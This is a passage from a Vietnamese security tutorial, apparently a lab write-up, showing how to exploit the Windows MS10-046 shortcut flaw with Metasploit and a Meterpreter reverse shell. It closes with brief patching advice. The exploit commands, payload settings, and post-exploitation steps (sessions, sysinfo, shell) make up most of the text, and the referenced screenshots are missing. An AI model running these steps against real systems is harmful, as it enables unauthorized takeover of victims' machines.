Các bước tấn công:

II. Lỗi MS10-046 (2286198)

2. Các bước tấn công:

 Saukhi khởi động BackTrack và đang nhập thành công, ta khởi động Terminal ta được:

 Ta gõ tiếp: msfconsole và enter:

Hệ Điều Hành

Windows XP Service Pack 3

Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*

Windows XP Professional x64 Edition Service Pack 2

Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*

Windows Server 2003 Service Pack 2

Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows Server 2003 x64 Edition Service

Pack 2 Windows 7 for 32-bit Systems Windows Server 2003 with SP2 for

Itanium-based Systems Windows 7 for x64-based Systems Windows Vista Service Pack 1 and

Windows Vista Service Pack 2

Windows Server 2008 R2 for x64-based Systems*

Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2

Windows Server 2008 R2 for Itanium- based Systems

72  Để dùng mã lỗi ms10-046: search ms10-046 và enter

 Ta gõ tiếp:

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader và

73  Dùng lệnh: show options để xem các tham số cần thiết để có thể tiến

hành tấn công đươc:

o SRVHOST: địa chỉ máy của kẻ tấn công, để lắng nghe có nạn nhân nào kết nối đến hay không

74  Ta sẽ:

o set PAYLOADwindows/meterpreter/reverse_tcp

o set SRVHOST 192.168.1.200

o set lhost địa chỉ IP: set LHOST 192.168.1.200. LHOST là tham số của PAYLOAD mà ta vừa set ở trên.

75  Trên máy tính nạn nhân, tạo 1 shortcut bằng cách nhấn phải chuột vào

76 Ta gõ vào địa chỉ của máy tấn công vào Type the location of the item:

http://192.168.1.200/anythingvà chọn Next

77  Đợi một lát, trên máy tính tấn công ta được:

78  Để tương tác với 1 session nào đó ta thực hiện: sessions –i 1 (1 là id của

sessions)

Và bây giờ thì mọi việc đã trở nên dễ dàng hơn, khi kẻ tấn công đã điều khiển được máy nạn nhân với toàn quyền. Ví dụ:

 Lệnh sysinfo để lấy thông tin của máy nạn nhân:

79  Lệnh rất hữu ích để sử dụng cmd (command-line): shell

3. Cách phòng chống

Thường xuyên cập nhật các bản vá lỗi của Windows để trách bị hacker lợi dụng.

80 Bản vá lỗi có tên mã là KB2286198 chứa đựng phiên bản mới của tập tin Shell32.dll, đây là phần cập nhật quan trọng. Shell32.dll là một tập tin thư viện rất quan trọng trong Windows, nó chứa đựng một số hàm Windows Shell API. Nếu Shell32.dll bị lỗi hay cập nhật lỗi, máy tính sẽ có tình trạng "Màn hình xanh chết chóc" hay Blue Screen.